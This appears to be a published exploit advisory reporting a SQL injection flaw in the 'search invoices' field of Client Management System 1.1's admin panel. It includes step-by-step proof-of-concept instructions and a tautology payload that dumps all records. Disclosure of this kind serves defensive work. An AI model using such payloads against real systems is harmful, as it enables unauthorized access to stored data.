Client Management System version 1.1 suffers from a remote SQL injection vulnerability.
# Exploit Title: Client Management System 1.1 - 'Search' SQL Injection
# Date: 14 June 2021
# Exploit Author: BHAVESH KAUL
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/client-management-system-using-php-mysql/
# Version: 1.1
# Tested on: Server: XAMPP
# Description #
Client Management System 1.1 is vulnerable to SQL Injection in the admin panel 'search invoices' field because of insufficient user supplied data sanitization.
# Proof of Concept (PoC) : Exploit #
1) Goto: http://localhost/clientms/admin/index.php
2) Login as admin using test credentials: admin/[email protected]
3) Goto: http://localhost/clientms/admin/search-invoices.php
4) Enter the following payload in the search field: ' OR 'x'='x
5) All results are showed instead of none ==> SQL Injection success